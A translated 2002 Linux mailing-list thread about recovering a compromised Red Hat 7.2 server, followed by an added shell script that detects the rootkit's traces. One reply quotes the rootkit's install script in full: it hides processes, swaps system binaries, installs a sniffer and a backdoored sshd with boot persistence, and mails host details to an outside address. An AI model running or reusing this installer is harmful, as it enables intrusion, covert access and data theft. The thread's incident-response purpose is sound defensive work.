I could help here too, though perhaps there are others among us who are more skilled :). In any case, the idea is good, I want to help.

On Sat, May 25, 2002 at 09:06:08PM +0300, Catalin Catana wrote:
> /me offers to help with the site's engine if it's about php+mysql,
> maybe postgresql too.
>
> Baba Bogdan said:
> > I'll offer hosting
> > T1 - USA QWEST.NET
> >
> > On Sat, 25 May 2002, Petre Daniel wrote:
> >
> >> The idea is excellent. You talk too much on the list, in my opinion.
> >> Vote on a central site (whoever offers hosting); I don't have much
> >> bandwidth, but I'll offer a domain.
> >> Whoever knows php&db should set up a small engine on the site. The
> >> admins sign up with their addresses and send mails with nicely grepped
> >> logs to the central address, which sorts them and puts on the web who
> >> is attacking and where.
> >> Although there are contracts involved and quite a lot of interests, I
> >> for one, if I see on www.abuse.ro that from the IP 194.102.92.x there
> >> were attempts or tries to exploit the services of Gushteru, or of that
> >> guy who barely keeps his cafe running, or of the serious company XXX,
> >> will do something to see who in my network is fooling around and, if
> >> possible, get rid of him. It seems wrong to me to let some kids play
> >> with the servers and abuse the bandwidth.
> >> Information is the most powerful thing, and if we can offer each other
> >> valuable information I say let's do it already.
> >> I have plenty of logs too, plenty have attacked me, but I managed on
> >> my own because I don't know where I could complain and what could be
> >> done.
> >> Why shouldn't we help each other as admins when we can?
> >> Blah blah.
> >> Come on already.
> >>
> >> Petre L. Daniel,System Administrator
> >> Canad Systems Pitesti Romania
> >> Tel:+4048206200,+4048220044
> >> http://www.cyber.ro
> >>
> >> At 05:35 PM 5/25/02 -0700, you wrote:
> >> >Hello Petre,
> >> >
> >> >Saturday, May 25, 2002, 5:14:28 PM, you wrote:
> >> >
> >> >PD> 2 mbps with abuse.zone.ro, let's say..
> >> >
> >> >let's first see that there is interest from the "target" :)
> >> >
> >> >Gusherul
> >> >
> >> >PD> /me
> >> >
> >> >PD> At 01:08 PM 5/25/02 -0700, you wrote:
> >> > >>Hello paul,
> >> > >>
> >> > >>One thing is good anyway: that you told me the mail address.
> >> > >>Whoever else has rootkits, chip in with the email addresses where
> >> > >>the info about the server gets sent. That way we get rid of them
> >> > >>a little :)
> >> > >>
> >> > >>Gushterul
> >> > >>P.S. By the way, how about a web page with all of them? Not to put
> >> > >>rootkits there, but info, so a person knows whom to whack over the
> >> > >>head. Let me rephrase: who is doing the hosting? :)
> >> > >>
> >> > >>Friday, May 24, 2002, 11:38:02 PM, you wrote:
> >> > >>
> >> > >>pzeur> Reinstall everything, then register with rhn_register at RH
> >> > >>pzeur> Network, and once you have registered your system with them
> >> > >>pzeur> you can use "up2date -u" for current updates. It looks like
> >> > >>pzeur> Windows but works well.
> >> > >>pzeur> If you have connection problems, let it fetch the headers,
> >> > >>pzeur> which it puts in /var/spool/up2date (you have about 200 MB of
> >> > >>pzeur> updates to download), look for a nearby mirror of
> >> > >>pzeur> updates.redhat.com (e.g. ftp.ubbcluj.ro), fetch from there
> >> > >>pzeur> the packages corresponding to the headers, put them in
> >> > >>pzeur> /var/spool/up2date and restart "up2date -u".
> >> > >>
> >> > >>pzeur> I also got holed through the wu-ftpd from RH 7.2, but the
> >> > >>pzeur> rootkit was for a different system, so I found it after about
> >> > >>pzeur> 3 hours (I was waiting for "up2date -u" to finish with the
> >> > >>pzeur> services running, idiot that I was :) when ps, ls, netstat
> >> > >>pzeur> were not working.
> >> > >>pzeur> So I quickly brought the respective apps over from another
> >> > >>pzeur> system, and surprise... nfsd -q -p 50000, which was a
> >> > >>pzeur> modified sshd. I looked through the directories and found in
> >> > >>pzeur> /var/ftp/ a directory that was not there the last time I
> >> > >>pzeur> looked. Searching through the files in it I came across a
> >> > >>pzeur> path to some library directory where there was something
> >> > >>pzeur> like this:
> >> > >>pzeur> .
> >> > >>pzeur> ..
> >> > >>pzeur> .lib
> >> > >>pzeur> .tooz
> >> > >>
> >> > >>pzeur> in .tooz was the install file:
> >> > >>pzeur> #private version from cur / not hacked by lamme assz as Em|nem or others!
> >> > >>pzeur> #phear my reverge all u mother fuckers
> >> > >>pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun
> >> > >>pzeur> #!/bin/sh
> >> > >>pzeur> unset HISTFILE
> >> > >>pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/
> >> > >>pzeur> chattr -iau /bin/ps
> >> > >>pzeur> chattr -iau /bin/ls
> >> > >>pzeur> chattr -iau /bin/netstat
> >> > >>pzeur> chattr -iau /bin/lpd
> >> > >>pzeur> rm -rf /etc/ssh*
> >> > >>pzeur> clear
> >> > >>pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib
> >> > >>sh sysinfo1 >> new-host
> >> > >>pzeur> sh ssh_random_key
> >> > >>pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/
> >> > >>pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/
> >> > >>pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/
> >> > >>pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps
> >> > >>pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls
> >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc
> >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr
> >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file
> >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps
> >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls
> >> > >>pzeur> mv ps /bin/ps
> >> > >>pzeur> mv ls /bin/ls
> >> > >>pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/
> >> > >>pzeur> mv netstat /bin/netstat
> >> > >>pzeur> chown root.root /bin/ls
> >> > >>pzeur> chown root.root /bin/ps
> >> > >>pzeur> chown root.root /bin/netstat
> >> > >>pzeur> mv linsniffer /bin/lpd
> >> > >>pzeur> rm -rf /etc/ssh*
> >> > >>pzeur> rm -rf /usr/man/man8/rpc.rstatd.8
> >> > >>pzeur> rm -rf /usr/sbin/rpc.rstatd
> >> > >>pzeur> rm -rf /usr/sbin/rpc*
> >> > >>pzeur> lpd &
> >> > >>pzeur> ./lpd
> >> > >>pzeur> mv sshd /bin/nfsd
> >> > >>pzeur> mv -f sshd_config /etc/
> >> > >>pzeur> mv -f ssh_host_key /etc/
> >> > >>pzeur> mv -f ssh_random_seed /etc/
> >> > >>pzeur> mv -f ssh_host_key.pub /etc/
> >> > >>pzeur> rm -rf ssh_random_key
> >> > >>pzeur> chattr +iau /bin/nfsd
> >> > >>pzeur> chattr +iau /etc/sshd_config
> >> > >>pzeur> chattr +iau /etc/ssh_host_key
> >> > >>pzeur> chattr +iau /etc/ssh_random_seed
> >> > >>pzeur> chattr +iau /etc/ssh_host_key.pub
> >> > >>pzeur> nfsd -q -p 50000
> >> > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit
> >> > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet
> >> > >>./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED]
> >> > >>pzeur> cat new-host |mail -s
> >> > >>pzeur> #-----done with ssh----
> >> > >>pzeur> killall -9 portmap
> >> > >>pzeur> killall rpc.statd
> >> > >>pzeur> rm -f /usr/sbin/rpc.statd
> >> > >>echo "ftp">>>/etc/ftpusers
> >> > >>echo "root">>>/etc/ftpusers
> >> > >>pzeur> cat /proc/cpuinfo
> >> > >>pzeur> mv pwd /dev/capi20.20
> >> > >>pzeur> rm -f sysinfo1
> >> > >>pzeur> rm -f sysinfo
> >> > >>pzeur> rm -f new-host
> >> > >>pzeur> rm -f sshd
> >> > >>pzeur> cd ..
> >> > >>pzeur> rm -rf s.tgz
> >> > >>pzeur> clear
> >> > >>pzeur> echo "****************************7.1***************************"
> >> > >>pzeur> echo "Oki"
> >> > >>pzeur> echo "***********************SpUrKaTu&TrUnKS********************"
> >> > >>
> >> > >>pzeur> there was also a file .1addr:
> >> > >>pzeur> 2 194.105
> >> > >>pzeur> 3 6666
> >> > >>pzeur> 3 6667
> >> > >>pzeur> 3 54789
> >> > >>pzeur> 3 31337
> >> > >>pzeur> 3 6668
> >> > >>pzeur> 3 6669
> >> > >>pzeur> 3 6666
> >> > >>pzeur> 2 194.102.233
> >> > >>pzeur> 2 209.142.209.161
> >> > >>pzeur> 2 217.10
> >> > >>pzeur> 2 213.233
> >> > >>
> >> > >>pzeur> I kept the files because you never know; among them there
> >> > >>pzeur> are also:
> >> > >>pzeur> hideps install lpd sense string tcp.log utils wipe
> >> > >>pzeur> .1addr .1file .1proc .ls netstat .ps
> >> > >>
> >> > >>pzeur> that is about what else I found
> >> > >>
> >> > >>pzeur> in general it is good to have original copies of ls, ps,
> >> > >>pzeur> netstat
> >> > >>
> >> > >>pzeur> good luck
> >> > >>
> >> > >>pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote:
> >> > >>
> >> > >> >> I run an RH 7.2 system on which I detected an intrusion. I
> >> > >> >> realized this because certain commands were not working
> >> > >> >> correctly.
> >> > >> >> 1. I repaired the compromised packages (net-tools, fileutils
> >> > >> >>    and procps) with rpm -U --force ...
> >> > >> >> 2. I downloaded chkrootkit, and chkproc tells me that 2 hidden
> >> > >> >>    processes are running:
> >> > >> >>    - You have 1 process hidden for readdir command
> >> > >> >>    - You have 1 process hidden for ps command
> >> > >> >> 3. chkrootkit "hangs" during the check at the position
> >> > >> >>    Checking 'aliens'...
> >> > >> >> 4. When I reboot the PC it gives me some errors when unmounting
> >> > >> >>    the /usr partition --> Illegal seek
> >> > >> >> 5. When I boot, a few messages appear saying that a program is
> >> > >> >>    shareware and I don't know what else... and that it listens
> >> > >> >>    on port 7000
> >> > >> >> 6. In boot.log this line appears:
> >> > >> >>    ... Starting backdoor daemon... Done, pid=...
> >> > >> >> Now I ask you:
> >> > >> >> - can there be other compromised packages besides the ones
> >> > >> >>   named?
> >> > >> >> - what is it with those hidden processes and how do I get rid
> >> > >> >>   of them?
> >> > >> >> - why does chkrootkit hang?
> >> > >> >> - if it really is a backdoor, how do I get rid of it?
> >> > >> >>
> >> > >> >> Hoping that I am not "annoying" you with such a long mail,
> >> > >> >> thank you in advance for your help.
> >> > >> >> Gaby
> >> >
> >> >---
> >> >To unsubscribe, send mail to
> >> >[EMAIL PROTECTED] with the subject 'unsubscribe rlug'.
> >> >RULES, archives and other information: http://www.lug.ro/mlist/
> >>
> >
> > --
> > Baba Bogdan
> >
> > System Administrator
> > CDS NETWORK, Corpus Christi, TX, US
> > --------------------------------o0()()0o-------------------------------
> > We can forgive a child who is afraid of the dark; the real tragedy of
> > life is when men are afraid of the light.
> > - Plato
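
The on-disk traces that the quoted install script leaves behind, turned into a check that can be run against a mounted copy of the disk. This is an added example, not part of the original thread: the function name `scan_rootkit_traces` and the output labels are made up here, while every path and the `nfsd -q -p 50000` string are copied from the quoted script.

```shell
#!/bin/sh
# Added example (not from the thread): report on-disk traces that the quoted
# "install" script leaves behind. Pass the root of a mounted disk so the check
# runs from a trusted system rather than from the compromised one.

# All paths and the command string below are copied from the quoted script.
HIDE_DIR='usr/src/linux/arch/alpha/lib/.lib'
PLANTED_BINS='bin/nfsd bin/lpd'
RC_FILES='etc/rc.d/rc.sysinit etc/rc.d/init.d/inet'
RC_MARKER='nfsd -q -p 50000'
FAKE_DEV='dev/capi20.20'

# Prints one line per finding; returns 1 if anything was found, 0 if clean.
scan_rootkit_traces() {
    root=${1:-/}
    root=${root%/}          # "/" becomes "", so "$root/bin" is "/bin"
    found=0

    # Hidden directory where the script stashes the original ps/ls/netstat
    # and its .1proc/.1addr/.1file files.
    if [ -d "$root/$HIDE_DIR" ]; then
        echo "hidden-dir $root/$HIDE_DIR"
        found=1
        for f in .ps .ls netstat .1proc .1addr .1file; do
            [ -e "$root/$HIDE_DIR/$f" ] && echo "hidden-file $root/$HIDE_DIR/$f"
        done
    fi

    # The modified sshd installed as nfsd, and linsniffer installed as lpd.
    for b in $PLANTED_BINS; do
        [ -e "$root/$b" ] && { echo "planted-binary $root/$b"; found=1; }
    done

    # Persistence: the backdoor start line appended to the boot scripts.
    for rc in $RC_FILES; do
        if [ -f "$root/$rc" ] && grep -qF -- "$RC_MARKER" "$root/$rc"; then
            echo "boot-persistence $root/$rc"
            found=1
        fi
    done

    # A regular file under /dev (the script moves a file named pwd there).
    [ -f "$root/$FAKE_DEV" ] && { echo "file-in-dev $root/$FAKE_DEV"; found=1; }

    return "$found"
}
```

Call it as `scan_rootkit_traces /mnt/suspect` from rescue media with the suspect disk mounted read-only, since on the running system `ls`, `ps` and `netstat` are the replaced copies.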
